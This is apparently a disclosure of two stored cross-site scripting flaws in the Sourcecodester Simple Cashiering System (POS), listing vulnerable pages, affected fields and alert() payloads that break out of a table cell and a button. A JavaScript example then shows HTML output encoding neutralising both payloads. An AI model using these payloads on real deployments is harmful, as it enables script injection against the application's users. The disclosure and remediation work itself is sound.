Multiple XSS (persistent) in Sourcecodester Simple Cashiering System (POS)

I found two persistent XSS vulnerabilities in the Sourcecodester Simple Cashiering System (POS) app.

  • Vulnerable URL: http://localhost/cashiering/?page=products
  • Affected fields: all except the price field
  • Payload: 6231415</td><script>alert(1)</script>

  • Vulnerable URL: http://localhost/cashiering/?page=manage_account
  • Affected field: Full Name
  • Payload: Administrator</button><script>alert("xss")</script> 
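
Added example (not code from the application or from this post): the two payloads above rendered into constructed table-cell and button templates, with and without HTML output encoding, to show why encoding stored values on output closes both issues. The template functions and `escapeHtml` are hypothetical names chosen for illustration.

```javascript
// Payloads exactly as listed above; everything else here is constructed for illustration.
const PAYLOADS = {
  product: '6231415</td><script>alert(1)</script>',
  fullName: 'Administrator</button><script>alert("xss")</script>',
};

// Encode the characters that are significant in HTML text and quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical templates mirroring the two contexts the payloads close
// (a table cell and a button label) before opening a script element.
function renderProductCell(value, encode) {
  return `<tr><td>${encode ? escapeHtml(value) : value}</td></tr>`;
}

function renderAccountButton(value, encode) {
  return `<button type="button">${encode ? escapeHtml(value) : value}</button>`;
}

// Simple check for a literal script start tag in the rendered markup.
// Good enough for this comparison; it is not a general XSS detector.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Render each stored value both ways and report whether a script tag survives.
function compare() {
  return {
    productRaw: containsScriptTag(renderProductCell(PAYLOADS.product, false)),
    productEncoded: containsScriptTag(renderProductCell(PAYLOADS.product, true)),
    accountRaw: containsScriptTag(renderAccountButton(PAYLOADS.fullName, false)),
    accountEncoded: containsScriptTag(renderAccountButton(PAYLOADS.fullName, true)),
  };
}

console.log(compare());
console.log(renderProductCell(PAYLOADS.product, true));
console.log(renderAccountButton(PAYLOADS.fullName, true));
```

With encoding applied at output time, the stored value is displayed as text and the surrounding `<td>` and `<button>` elements stay intact.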

 


